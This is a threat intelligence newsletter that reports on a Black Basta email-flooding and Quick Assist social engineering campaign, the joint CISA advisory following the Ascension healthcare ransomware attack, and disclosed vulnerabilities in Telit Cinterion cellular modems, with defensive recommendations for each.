Ransomware/Malware Activity
New Social Engineering Campaign Using Email Spam Linked to Black Basta
Cybersecurity teams at Rapid7 and Microsoft have identified an ongoing social engineering campaign that leverages Microsoft's built-in Quick Assist feature to gain remote access to victims' desktops. Threat actors effectively launch the attack with the email addresses of only one or more employees of the target organization.
Attackers subscribe the email address to numerous mailing lists, inundating the recipient with an overwhelming volume of unsolicited emails. They then call the victim, posing as the IT team, and offer to install an update to solve the email problem. The attacker instructs the victim to launch Windows' Quick Assist tool to grant them access to the machine. Once the threat actor has access, they run a scripted command to download batch and zip files that deliver malicious payloads. One of the batch scripts is used to harvest the victim's credentials. The victim is prompted to enter to complete the fake update as a requirement.
Microsoft reports that once the attackers have access to the victim's machine, multiple tools are downloaded including Qakbot, ScreenConnect, and Cobalt Strike. Once the initial tooling is installed, attackers perform domain enumeration and lateral movement before finally using PsExec to deploy Black Basta ransomware.
Black Basta is a Ransomware-as-a-Service operation that is believed to be an offshoot of the Conti cybercrime group. CTIX analysts recommend organizations consider blocking remote access tools that are not required by policy, and to educate employees on how to detect tech support frauds. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
Threat Actor Activity
Black Basta Joint Advisory Released Days After Attack on Ascension Healthcare Network
Last week, Ascension, a major U.S. healthcare network, experienced clinical operation disruptions and system outages causing them to divert ambulances to unaffected facilities after falling victim to a ransomware attack carried out by the Black Basta ransomware gang.
A joint advisory was released by CISA just a few days after, in collaboration with the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC). The Russian-speaking threat actors typically breach targets via phishing attacks and known vulnerabilities, employing a double-extortion tactic. The group commonly targets private organizations and critical infrastructure entities in North America, Europe, and Australia.
- The joint report notes that Black Basta, a Ransomware-as-a-Service operation that first surfaced in April 2022, has breached over five hundred organizations globally.
- The agencies also reported that the gang has encrypted and stolen data from at least twelve out of the sixteen critical infrastructure sectors while observing a recent acceleration of attacks against the healthcare sector.
- The report states that "Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions."
- The advisory includes tactics, techniques, and procedures (TTPs) used by the threat actors as well as indicators of compromise (IOCs) to better help readers defend against their attacks.
Black Basta was the 12th most active ransomware family in 2023 and has already seen a 41% quarter-over-quarter spike in Q1 2024. CTIX analysts recommend organizations, especially in the healthcare sector, maintain common cyber-hygiene practices, implement security controls such as multi-factor authentication (MFA), and look for ways to recognize and mitigate phishing attempts.
- The Hacker News: Black Basta Article
- The Record: Black Basta Article
- Bleeping Computer: Black Basta Article
Vulnerabilities
Multiple Security Flaws in Cinterion Cellular Modems
Multiple security flaws existing in Telit Cinterion cellular modems, popularly used in communication networks and IoT devices, have recently been disclosed. The vulnerabilities could allow attackers to execute arbitrary code via SMS or access sensitive information. The identification of affected products is complicated, escalating the risks since these modems are often integrated into various solutions and paired with products from multiple vendors. The security issues, which were reported to the vendor in February 2023 and later disclosed in November, include CVE-2023-47610 through CVE-2023-47616, along with another issue that has yet to be registered.
The most severe flaw is CVE-2023-47610 (CVSS score: 8.1), a heap overflow problem that affects the modem's UserPlane Location (SUPL) message handlers and allows unauthenticated remote attackers to execute arbitrary code via SMS messages. The SMS messaging interface is present on all modems, and access is possible if the subscriber number of the target modem in the cellular operator's network is known. Exploiting this vulnerability can give an attacker deep-level access to the modem's operating system, which could facilitate the manipulation of RAM and flash memory.
The other vulnerabilities, while having lower severity scores, could still be exploited to compromise the integrity of MIDlets (java-based applications running within the modems). This would allow attackers to bypass digital signature checks, enabling the execution of unauthorized code execution with increased privileges. Although these findings pertain to the Cinterion EHS5-E series modem, the Cinterion BGS5, EHS5/6/7, PDS5/6/8, ELS61/81, and PLS62 modems have similar hardware and software architectures and therefore are also at risk.
To mitigate these issues, CTIX analysts recommend disabling non-essential SMS capabilities for impacted devices and employing securely configured private Access Point Names (APNs).
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.